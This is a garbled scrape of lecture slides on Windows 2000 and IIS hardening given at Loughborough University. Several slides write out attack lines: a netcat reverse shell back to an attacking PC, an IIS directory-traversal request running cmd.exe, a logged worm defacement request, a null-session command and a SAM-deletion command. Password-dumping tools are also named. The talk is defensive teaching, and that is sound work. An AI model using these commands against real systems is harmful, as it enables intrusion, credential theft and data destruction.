WinSecurity
-
Upload
achmad-hidayat -
Category
Documents
-
view
212 -
download
0
Transcript of WinSecurity
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 1/70
1
Windows 2000 SecurityWindows 2000 Security
Matthew Cook
Loughborough Universityhttp://www.escarpment.net/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 2/70
2
Introduction
Loughborough University
http://www.lboro.ac.uk/computing/
Janet Web Cache Service
http://wwwcache.ja.net
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 3/70
3
Security @ Lboro
3 Evaluation of Security Service/Policy
3 Demand for Windows and Linux security
advice3 Need for other OS security advice
3 Installation of Internet Facing Windows
2000 systems.
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 4/70
4
Windows 2000 Security
3 Overview of General Security Threats
3 Workstation Security
3 Server Security
3 IIS Security
3 Security Tools
3 Questions and Answers
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 5/70
5
Physical Security
"The only system which is trulysecure is one which is switched off
and unplugged, locked in a titaniumlined safe, buried in a concretebunker, and is surrounded by …
very highly paid armed guards. Eventhen, I wouldn't stake my life on it."
Gene Spafford
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 6/70
6
Security Threats
3 Denial of Service
3 Theft of information
3 Modification
3 Fabrication (Spoofing or Masquerading)
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 7/70
7
Security Holes
3 Physical Security Holes
3 Software Security Holes
3 Incompatible Usage Security Holes
3 Social Engineering
3 Complacency
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 8/70
8
Workstation Security
Security for General Workstations
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 9/70
9
Workstation Security
3 Physical Security
3 BIOS
3 Service Packs and Hot fixes3 NTFS ACLS
3 Policies and Profiles
3
Security Templates3 Auditing
3 Threats
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 10/70
10
Service Packs and Hot fixes
3 Ensure you have the latest ‘evaluated’
service packs and hot fixes.
3 Check the model periodically3 Hfnetchk Tool
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 11/70
11
NTFS ACLS
3 Ensure you use NTFS
3 Partition your drives per application
3 Use xcacls from the Resource Kit
3 Script NTFS security
3 Set using Security Templates
3 Example
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 12/70
12
Policies and Profiles
3 NT Policy files are different to GPO (Group
Policy Objects) in Windows 2000
3 LGPO located in:%windir%\system32\grouppolicy
3 ADGPO located in:
%windir%\system32\sysvol\camford\policies3 Demonstration
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 13/70
13
Security Templates
3 Use ‘Security Settings’ applet to apply
3 Located in %windir%\security\templates
3 Quick and Easy to apply
3 Templates are accumulative
3 Demonstration
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 14/70
14
Security Templates…
3 Setup security – Default settings
3 Compatws – Compatible
3 Basicdc/sv/wk – Basic Security
3 Securedc/wk – More Secure
3 Hisecdc/ws – Further Security
3 Ocfiless/w – Optional Components
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 15/70
15
Auditing & Event Logs
3 Use the ‘Security Settings’ applet to ensure
the Audit Policy has been configured
3 Check the Event Viewer regularly3 Or Use NTLast (Foundstone)
3 URL: http://www.foundstone.com/
3 Or ELM (TNT Software)
3 URL: http://www.tntsoftware.com/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 16/70
16
Threats
3 PipeUpAdmin and PipeUpSAM
3 Netddemsg
3 EFS
3 DOS Boot disc
3 Linux Boot disc
3 BIOS Passwords
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 17/70
17
PipeUpAdmin & PipeUpSAM
3 Uses vulnerability in Named Pipes in the
Service Control Manger (SCM)
3 Adds user to Administrator Group3 Patch Bulletin: MS00-053
3 URL: http://www.dogmile.com/files/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 18/70
18
Netddemsg
3 Uses vulnerability in NetDDE
3 Provides cmd in SYSTEM context
3 Patch Bulletin: MS01-007
3 NOT included in Windows 2000 SP2
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 19/70
19
EFS
3 Changing the password of the recovery
agent. (Administrator)
3 Changing the password of the user 3 EFS temporary files
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 20/70
20
DOS Boot Disc
3 DOS NTFS drivers bypass NTFS ACLS3 Allows removal of the SAM
del %windir%\system32\config\sam3 Allows extraction of the SAM3 URL: http://www.sysinternals.com/
3
URL:http://www.esiea.fr/public_html/Christophe.GRE NIER/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 21/70
21
Linux Boot Disc
3 Edit SAM password hashes
3 Disable SYSKEY
3 Limited SCSI support
3 URL: http://home.eunet.no/~pnordahl/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 22/70
22
BIOS Passwords
3 Even a BIOS password is not secure
3 Check for vulnerabilities
3 Check for Default Passwords
3 Upgrade BIOS
3 URL:http://www.esiea.fr/public_html/Christophe.GRE
NIER/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 23/70
23
Server Security
Security for Internet Facing Servers
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 24/70
24
Server Security
3 Advice for Workstation Security
3 NetBIOS/SMB Services
3 Hfnetchk and Qchain
3 SNMP Vulnerabilities
3 Active Directory Vulnerabilities
3 IPSec
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 25/70
25
NetBIOS/SMB Services
3 NetBIOS Name Service [Port UDP 137]
3 NetBIOS Session Service [Port TCP 139]
3 SMB over TCP [Port 445]
3 Port 445 Windows 2000 only
3 Block TCP/UDP 135-139 and 445 at the
firewall
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 26/70
26
NetBIOS/SMB Services…
Null Authentication:
Net use \\camford\IPC$ “” /u:“”
3 Famous tools like ‘Red Button’
Net view \\camford
3 Investigate srvcheck and srvinfo in the
Resouce Kit
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 27/70
27
NetBIOS/SMB Services…
3 Dumpsec from Somarsoft
3 URL: http://www.somarsoft.com
3 Enum from Razor
3 URL: http://razor.bindview.com/
3 A Google search reveals many, many more
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 28/70
28
NetBIOS/SMB Services…
To disable NetBIOS
2. Select ‘Disable NetBIOS’ in the WINS
tab of advanced TCP/IP properties.3. Deselect ‘File and Print sharing’ in the
advanced settings of the ‘Network and
Dial-up connections’ window
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 29/70
29
NetBIOS/SMB Services…
Disable Null Authentication
3 Key similar to Windows NT 4.0
3 HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
3 REG_DWORD set to 0, 1 or 2!
3 HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
3 REG_DWORD set to 0 or 1
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 30/70
30
Hfnetchk
3 Use Hfnetchk to check hot fixes
3 Checks machines against Microsoft XML
3 Automate the process using a batch filesand a mail client (Postie)
3 URL: http://www.infradig.com/infradig/postie/
3 Use QChain to chain hot fixes together
without rebooting in-between.
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 31/70
31
Hfnetchk…
Patch details for:
3 Windows NT 4.0 and Windows 2000
3 IIS 4 and IIS 5
3 SQL Server 7.0
3 SQL Server 2000
3 Internet Explorer 5.01 (and later)
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 32/70
32
Hfnetchk…
3 Default scan of local host (Pre downloaded)hfnetchk –x mssecure.xml
3 Default scan of lboro domainhfnetchk –d lboro
3 Verbose scan of local hosthfnetchk –v –x mssecure.xml
3 Verbose scan including installed hot fixeshfnetchk –v –a b –x mssecure.xml
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 33/70
33
Hfnetchk…
3 Test problemshfnetchk –z –v –x mssecure.xml
3 XML File Downloadhttp://download.microsoft.com/download/xml
/security/1.0/nt5/en-us/mssecure.cab
3 Using an internal copy of the XMLhfnetchk –x http://camford.ac.uk/mssecure.xml
hfnetchk –x s:\camford\mssecure.xml
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 34/70
34
QChain
Supported by:
3 Windows NT 4.0
3 Windows 2000
3 Windows XP (25th October 2001)
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 35/70
35
QChain…
3 Run the hot fix with –z (No reboot) and –m(Quiet mode)
3
Run qchain and then reboot3 Create a log using qchain [logname]3 Create batch files on a central server 3
URL:http://www.microsoft.com/Downloads\Release.as p?ReleaseID=29821
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 36/70
36
SNMP Vulnerabilities
3 Simple Network Management Protocol3 Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
3 SNMP Utilities in Resource Kit3 Turn off SNMP services
3 Set community names
3 Set accepted hosts
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 39/70
39
IPSec
3 Currently investigating
3 Linux Connectivity using FreeS/WAN
3 Mainly for wireless use
3 WEP encryption cracked
3 URL: http://www.freeswan.org/
3 URL: http://airsnort.sourceforge.net/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 40/70
40
IIS Security
Internet Information Server
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 41/70
41
IIS Security
3 History
3 Recent Worms
3 IIS Lock Down Tool
3 URL Scan
3 The Future
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 42/70
42
IIS History
3 IIS 2.0 Installed by NT 4.0
3 IIS 3.0 followed by more common IIS 4.0
3 Quickly gained reputation for (in)security
3 IIS 5.0 Installed by Windows 2000
3 Microsoft releases Hfnetchk
3 Closely followed by IIS Lockdown and
URLScan
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 43/70
43
Recent Worms
3 Sadmind/IIS
Directory Traversal (Unicode Exploit)
3 CodeRedida/idq buffer overflow
3 CodeGreen
ida/idq buffer overflow3 Nimda
Directory Traversal (Unicode Exploit)
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 44/70
44
Sadmind/IIS
3 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80GET /scripts/root.exe/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table
+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+col
or%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:[email protected]^</html^>>../wwwroot/default.htm 200 -
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 45/70
45
System Attacks
3 Monday Morning Phone Call
3 Perl Script ‘unicodeloader’
3 http://camford/scripts/upload.asp3 http://camford/scripts/cmdasp.asp
3 Sadmind/IIS worm and unicodeloader kit
3 GET /scripts/../../winnt/system32/cmd.exe
/c+dir 200 –
3 URL: http://www.sensepost.com/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 46/70
46
System Attacks…
3 Obtaining a remote shell
3 Attacking PC:
nc –l –p 12343 Camford:
nc.exe –v –e cmd.exe <attackingpc> 1234
3 URL: http://www.atstake.com/research/tools/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 47/70
47
System Attacks…
3 Shell is in the context of IUSR_camford3 ISAPI.dll – RevertToSelf (Horovitz)
3 Upload using upload.asp3 http://camford/scripts/idq.dll
3 Version 2 coded by Foundstone
3 http://camford/scripts/idq.dll?3 Patch Bulletin: MS01-263 NOT included in Windows 2000 SP2
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 48/70
48
IIS Lock Down Tool
3 Automatic ‘Lock Down’3 Locks down IIS 4.0 and IIS 5.0
3 Express ‘lock down’ for simple web sites3 Custom ‘lock down’ for more complex
servers
3
Undo facility to reverse last ‘lock down’3 URL:
http://www.microsoft.com/Downloads\Release.as p?ReleaseID=32362
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 49/70
49
IIS Lock Down Tool…
Disable:
3 Active Server Pages
3
Index Server Interface3 Server Side Includes
3 Internet Data
Connector
3 Internet Printing
3 HTR Scripting
Remove:
3 Sample Web Files
3 Script VirtualDirectory
3 MSADC Directory
3 WebDAV
Set Permissions on:3 Exe files3 Content Directories
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 50/70
50
URL Scan
3 ISAPI filter scans incoming HTTP requests
3 Filtered based on rule set3
New rules easily added3 Default urlscan.ini suitable for static pages3 Restart service when changes made3
404 and logged request for matched rules3 URL:
http://www.microsoft.com/Downloads\Release.as p?ReleaseID=32571
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 51/70
51
URL Scan…
Filter on:
3 The request method (verb)
3 File Extension3 URL Encoding
3 Non ASCII characters
3 Malicious character sequence
3 Headers in HTTP GET
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 52/70
52
The Future
3 Gartner report recommends ditching IIS
3 Rewrite of IIS on the cards for version 6
3 Lock Down Tool (Interim Measures)3 Httpd functionality in the kernel (TechEd)
3 IIS Lockdown included in SP3
3 Further implications for .NET
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 53/70
53
Security Tools
A look at the freeware and
‘pay for’ tools available.
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 54/70
54
Security Tools
3 Snort3 CIS and Typhon
3 Pwdump3 Fport
3 L0pht Crack
3 Nmap3 Nessus3 Pandora
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 55/70
55
Snort
3 IDS – Intrusion Detection System
3 Libpcap packet sniffer and logger
3 Originally developed for the Unix platforms3 Open Source
3 Port to Win32 available (Release 1.8.1)
3 Installation on Win32 in under 30 minutes
3 Run on your IIS server or standalone
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 56/70
56
Snort…
Snort can detect:3 Stealth Port Scans
3 CGI Attacks3 Front Page Extensions Attacks
3 ICMP Activity
3 SMTP Activity3 SQL Activity3 SMB Probes
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 57/70
57
Snort…
3 Default logging to snort\logs\alert.ids3 Log to mySQL and SQL Server
3 Notification as logs, ‘winpopup’, email etc3 SnortSnaf or ACID (PHP Based)
3 GUI – IDS Center
3 URL: http://snort.sourcefire.com/3 URL: http://www.cert.org/kb/acid/
3 URL: http://www.silicondefense.com/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 59/70
59
CIS and Typhon
3 Typhon, formally Cerberus Internet Scanner
3 Written by David Litchfield
3 URL: http://www.nextgenss.com/
3 Demonstration
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 60/70
60
CIS and Typhon
3 Web Checks
3 FTP Checks
3
SMTP Checks3 POP3 Checks
3 NT Checks
3
NetBIOS Checks3 MS SQL Checks
3 SNMP Checks
3 RPC Checks
3
Portscan (TCP/UDP)3 Finger Checks
3 DNS Checks
3 Commercial Version
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 61/70
61
Pwdump
3 Version 3 (e = encrypted)
3 Developed by Phil Staubs and Erik
Hjelmstad3 Based on pwdump and pwdump2
3 URL: http://www.ebiz-
tech.com/html/pwdump.html
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 62/70
62
Pwdump…
3 Needs Administrative Privilidges
3 Extracts hashs even if syskey is installed
3 Extract from remote machines3 Identifies accounts with no password
3 Self contained utility
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 63/70
63
Fport
3 Reports on all open TCP and UDP ports
3 Maps Port to Application
3 Requires psapi.dll (Windows NT 4.0)3 URL: http://www.foundstone.com/
3 Demonstration
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 64/70
64
L0pht Crack
3 Password Auditing and Recovery
3 Crack Passwords from many sources
3 Registration $2493 URL: http://www.atstake.com/research/lc3/
3 Demonstration
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 65/70
65
L0pht Crack…
Crack Passwords from:
3 Local Machine
3 Remote Machine3 SAM File
3 SMB Sniffer
3 PWDump file
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 66/70
66
Nmap
3 Port Scanning Tool
3 Stealth scanning, OS Fingerprinting
3 Open Source3 Runs under Unix based OS
3 Port development for Win32
3 URL: http://www.insure.org/nmap/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 68/70
68
Nessus
3 Remote security scanner similar to Typhon
3 Very comprehensive
3 Frequently updated modules3 Testing of DoS attacks
3 Open Source
3 Win32 and Java Client
3 URL: http://nessus.org/
8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 69/70
69
Pandora
3 Not strictly Windows 2000 Security
3 Runs on either Unix or Win32
3 Excellent tool to evaluate Netware security3 Open Source
3 Lots of additional information
3 URL: http://www.nmrc.org/pandora/